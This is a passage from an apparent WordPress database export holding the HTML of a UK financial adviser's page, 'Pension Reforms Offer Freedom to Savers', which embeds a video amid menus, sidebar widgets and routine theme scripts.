id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Pension Reforms Offer Freedom to Savers										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>Pension Reforms Offer Freedom to Savers</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8701\" class=\"post-8701 post type-post status-publish format-video hentry category-pensions category-video-2 tag-video post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Pension Reforms Offer Freedom to Savers</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe class=\"wistia_embed\" src=\"http://fast.wistia.net/embed/iframe/9ybpbjuu4b\" name=\"wistia_embed\" width=\"640\" height=\"388\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: <a href=\"../tag/video/\" rel=\"tag\">video</a></span><span class=\"sep\">|</span><span>Comments Off</span>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;p[title]=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Pension+Reforms+Offer+Freedom+to+Savers%20http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;title=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;title=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fpension-reforms-offer-freedom-savers%2F&amp;name=Pension+Reforms+Offer+Freedom+to+Savers&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fpension-reforms-offer-freedom-savers%2F&amp;description=Pension+Reforms+Offer+Freedom+to+Savers&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Pension Reforms Offer Freedom to Savers&amp;body=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are closed. -->&#13;\n		<p class=\"no-comments\">Comments are closed.</p>&#13;\n&#13;\n	&#13;\n&#13;\n								</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n									<div class=\"meta\">&#13;\n										May 22nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (4)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (8)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				<p class=\"web\">Web: <a href=\"/\">Investor London</a></p>&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Pension Reforms Offer Freedom to Savers','Read about','publish','closed','closed','','pension-reforms-offer-freedom-to-savers','','','2017-09-21 17:36:37','2017-09-21 17:36:37','',105,'http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-to-savers',0,'page','',0),(91,1,'2017-09-21 16:34:36','2017-09-21 16:34:36','<body class=\"page page-id-90 page-child parent-pageid-25 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" 